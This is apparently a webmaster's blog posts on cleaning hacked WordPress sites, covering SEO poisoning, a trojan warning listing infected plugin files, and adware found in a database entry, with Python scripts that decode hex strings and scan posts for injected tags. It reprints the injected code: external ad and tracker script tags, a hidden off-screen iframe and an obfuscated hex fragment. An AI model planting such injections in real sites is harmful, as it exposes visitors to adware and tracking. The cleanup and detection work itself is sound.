What is SEO poisoning?

I found the following article that introduced me to the term “SEO poisoning.”

http://www.scmagazine.com/attackers-use-seo-spam-to-improve-the-rankings-of-their-websites-on-google-and-other-search-engines/article/375339/

I was considering this Cross-Site Scripting, but the code wasn’t malicious; it was just leading back to another site selling their services. The term SEO poisoning makes more sense. The goal of this poisoning is to increase the rankings of the company performing the action by embedding links into a legitimate site and linking back to their site. Link backs are part of the matrix Google uses to rank your site.

The links are often displayed off screen, so webmasters are usually unaware of the poisoning even happening. Fortunately, some of the writers of the plugins are aware of this technique and are incorporating tools into their plugins.

WordPress site blocked by SonicWall – JS.Agent.NKW_2 (Trojan)

Had a customer’s website blocked by our internal firewall.

They were running the WP Antivirus Site Protection plug-in. It listed the following files.

  • /wp-content/plugins/nextgen-gallery/nggallery.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/lib/imagemagick.inc.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.router.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.routing_app.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/interface.routing_app.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/wordpress_routing/adapter.wordpress_routing_app.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/admin/functions.php
  • /wp-content/plugins/si-contact-form/includes/class-fscf-process.php

 

This link provided me with some detail. There was code that looked like "\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72",

Deleting this out is supposed to help.
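Before deleting anything, it helps to see what the escaped strings say. The following is an added example, not code from the original post or from any plugin: it decodes string literals made up entirely of \xNN escapes and lists the files that carry several of them. The file names, the variable name _0xa and the threshold are assumptions, and the sample is constructed from the fragment quoted above with its quoting restored.

```python
import re

# A quoted literal whose whole body is \xNN escapes (four or more of them).
HEX_LITERAL = re.compile(r"""(["'])((?:\\x[0-9A-Fa-f]{2}){4,})\1""")

def decode_hex_literals(source):
    """Return (line_number, decoded_text) for every all-hex string literal."""
    found = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in HEX_LITERAL.finditer(line):
            raw = bytes.fromhex(match.group(2).replace("\\x", ""))
            found.append((lineno, raw.decode("latin-1")))
    return found

def triage(files, threshold=3):
    """Map file name -> decoded strings for files with >= threshold hex literals."""
    report = {}
    for name, text in files.items():
        decoded = [s for _, s in decode_hex_literals(text)]
        if len(decoded) >= threshold:
            report[name] = decoded
    return report

# Constructed sample: hypothetical file names; the escaped strings are the ones
# quoted in the post, wrapped in a made-up array called _0xa.
SAMPLE_FILES = {
    "infected.php": (
        "<?php /* constructed plugin file */ ?>\n"
        r'<script>var _0xa=["\x73\x63\x5F\x63\x6F",'
        r'"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",'
        r'"\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68",'
        r'"\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74",'
        r'"\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72"];'
        "</script>\n"
    ),
    "clean.php": "<?php echo \"\\x41\"; $title = 'Gallery'; ?>\n",
}

if __name__ == "__main__":
    for name, strings in triage(SAMPLE_FILES).items():
        print(name, strings)
```

The decoded names are browser properties (screen size, colour depth, charset, location, referrer), which is what a visitor-tracking script reads.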

https://wordpress.org/support/topic/jsagent-warnings-in-avg-nightmare-hack-in-multiple-wordpress-sites

Here is a good article on this issue.

http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html

 

 

WordPress site infected with CouponDropDown Adware

A customer’s WordPress site got hacked. They use Network Solutions as their host. Network Solutions took their site offline. We had to delete all the WordPress files, upload a clean version, and put their content and theme back. After that the site was back up and running.

I reviewed the site to make sure the permalinks didn’t cause a problem. On one page there were banner ads showing up.

The issue turned out to be a form of Cross-Site Scripting or SEO poisoning. There was a database entry that had the extra text in it. Here is the text below.

————————————————————————————————–

<div id="__tbSetup"></div>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>
<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={6C425871-ABD5-4124-A2B2-C02CE1D37F67}&amp;d=2013-1-17&amp;s=http://mcmanus-darden.com/home/wp-admin/post.php?post=361&amp;action=edit"></script>
<script id="__changoScript" type="text/javascript">// <![CDATA[
var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();
// ]]></script>
<script id="__simpliScript" type="text/javascript" src="http://i.simpli.fi/dpx.js?cid=3065&amp;m=1" data-sifi-parsed="true"></script>
<script type="text/javascript" src="http://www.superfish.com/ws/sf_main.jsp?dlsource=wjfudcm&amp;userId=ezZDNDI1ODcxLUFCRDUtND&amp;CTID=default-US"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
<script type="text/javascript" src="http://i.simpli.fi/p?cid=3065&amp;cb=dpx_48652254532._hp"></script>
<iframe id="l3adg3n-xdm" style="position: absolute; top: -1000px; left: -1000px; width: 1px; height: 1px;" src="http://www.vitruvianleads.com/build/xdm.html" width="320" height="240"></iframe>

————————————————————————————————–

There were multiple entries under this title. I used the source to figure out the actual page it was affecting. It was entry 361. There were approximately 20 revisions, but it was the original 361 that took the script off the site. It was in some revisions but not all.
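A way to find every affected entry and revision in one pass, as an added example that is not part of the original post: it parses post content exported from the wp_posts table and reports script and iframe tags that load from hosts outside an allow-list, plus iframes positioned off screen, grouped under the parent post. The rows, host names and allow-list are constructed; only the column names (ID, post_parent, post_type, post_content) and the 'revision' post type are WordPress's own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline style that pushes an element off the visible page, e.g. "top: -1000px".
OFFSCREEN = re.compile(r"(?:top|left)\s*:\s*-\d+px", re.I)

class InjectionFinder(HTMLParser):
    """Collects script/iframe tags loading from hosts outside the allow-list."""
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed, self.hits = allowed_hosts, []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        attr = dict(attrs)
        host = urlparse(attr.get("src") or "").hostname
        if host and host not in self.allowed:
            self.hits.append((tag, host))
        if tag == "iframe" and OFFSCREEN.search(attr.get("style") or ""):
            self.hits.append(("offscreen-iframe", host or "(no src)"))

def scan_posts(rows, allowed_hosts):
    """rows: (ID, post_parent, post_type, post_content); groups hits by parent post."""
    report = {}
    for post_id, parent, post_type, content in rows:
        finder = InjectionFinder(allowed_hosts)
        finder.feed(content)
        finder.close()
        if finder.hits:
            root = parent if post_type == "revision" else post_id
            report.setdefault(root, {})[post_id] = sorted(set(finder.hits))
    return report

# Constructed rows: a page, two of its revisions and an unrelated clean post.
SAMPLE_ROWS = [
    (361, 0, "page", '<p>Welcome</p><div id="__tbSetup"></div>'
        '<script src="http://cdn.ads.example.net/l.js?pid=1"></script>'
        '<iframe style="position: absolute; top: -1000px; left: -1000px;" '
        'src="http://leads.example.org/xdm.html"></iframe>'),
    (362, 361, "revision", "<p>Welcome</p>"),
    (363, 361, "revision", '<p>Welcome</p>'
        '<script src="http://cdn.ads.example.net/l.js?pid=1"></script>'),
    (400, 0, "post", '<script src="https://www.example.com/js/site.js"></script>'),
]

if __name__ == "__main__":
    print(scan_posts(SAMPLE_ROWS, {"www.example.com"}))
```

Inline scripts that build their own script element at run time carry no src attribute, so they need a separate text search.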

I hope this helps someone else….